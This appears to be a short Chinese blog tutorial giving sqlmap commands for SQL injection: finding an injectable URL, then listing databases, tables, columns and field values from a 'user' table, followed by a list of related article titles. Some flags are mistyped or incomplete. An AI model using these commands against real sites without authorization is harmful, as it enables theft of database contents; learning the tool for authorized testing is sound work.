sqlmap注入流程
一、判断SQL注入点
sqlmap.py -u “网址”
二、查询数据库信息
sqlmap.py -u “网址” --dbs
三、查询表的信息
通过数据库查询数据表的信息
sqlmap.py -u “网址” -D cake --tables
四、查询字段的信息
通过数据表查询字段的信息
sqlmap.py -u “网址” -D cake -T user -columns
五、通过字段查询字段的值
sqlmap.py -u “网址” -D cake -T user -C
相关文章
- 02-05spring中注解注入 context:component-scan 的使用说明
- 02-05PE基础6_远程线程注入-HOOK(消息-InLine-IAT)
- 02-05ctfhub技能树—sql注入—Refer注入
- 02-05解决vue单页面应用做微信JSSDK注入权限时出现“invalid signature”(ios端)
- 02-05由idea springcloud项目,@FeignClient 注入时报红的问题而找到的bug
- 02-05constructor注入错误org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean
- 02-05Sqli-labs Less-15 延时注入
- 02-05利用cookie进行SQL注入——看来还是人工注入要熟悉才行
- 02-05Sqli-labs Less-16 布尔注入
- 02-05Spring MVC : ServletRequest 注入原理分析 1 - 为什么可以注入成功?